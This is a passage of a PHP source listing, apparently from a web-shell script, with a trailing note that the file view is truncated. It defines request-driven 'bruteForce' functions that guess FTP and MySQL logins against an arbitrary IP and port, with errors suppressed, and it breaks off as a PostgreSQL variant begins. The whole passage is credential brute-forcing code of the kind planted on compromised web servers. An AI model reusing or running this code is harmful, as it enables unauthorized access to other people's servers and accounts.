  1017. if( $_POST['proto'] == 'ftp' ) {
  1018. function bruteForce($ip,$port,$login,$pass) {
  1019. $fp = @ftp_connect($ip, $port?$port:21);
  1020. if(!$fp) return false;
  1021. $res = @ftp_login($fp, $login, $pass);
  1022. @ftp_close($fp);
  1023. return $res;
  1024. }
  1025. } elseif( $_POST['proto'] == 'mysql' ) {
  1026. function bruteForce($ip,$port,$login,$pass) {
  1027. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  1028. @mysql_close($res);
  1029. return $res;
  1030. }
  1031. } elseif( $_POST['proto'] == 'pgsql' ) {
  1032. function bruteForce($ip,$port,$login,$pass) {

Large files files are truncated, but you can click here to view the full file